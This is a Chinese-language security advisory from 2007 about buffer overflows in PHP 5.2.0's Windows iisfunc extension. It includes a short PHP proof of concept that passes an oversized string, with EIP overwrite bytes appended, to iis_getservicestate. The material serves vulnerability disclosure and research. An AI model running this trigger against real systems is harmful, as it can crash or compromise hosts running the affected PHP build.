PHP IISFunc扩展本地溢出漏洞
发布日期:2007-08-27
更新日期:2007-08-29
受影响系统:PHP PHP 5.2.0
描述:
BUGTRAQ ID:
25452
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的php_iisfunc.dll库将字符串参数转换为Unicode时的多个缓冲区溢出漏洞,远程攻击者可能利用此漏洞导致执行任意指令。
<*来源:boecke (
boecke@herzeleid.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
// ==================================================================================
//
// php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
// Discovery: boecke <
boecke@herzeleid.net>
// Risk: Local Buffer Overflow (Medium - High Risk)
// Notes: Various other functions are exploitable, all of which convert the
// string argument(s) to unicode.
//
// extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
// "Sangre, sonando, de rabia naci.. Who do you trust?"
// - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================
if ( !extension_loaded( "iisfunc" ) )
{
die( "Extension not loaded.\n" );
}
$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";
iis_getservicestate( $buf_unicode . $eip_unicode );
?>
建议:
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.php.net浏览次数:3023
严重程度:0(网友投票)
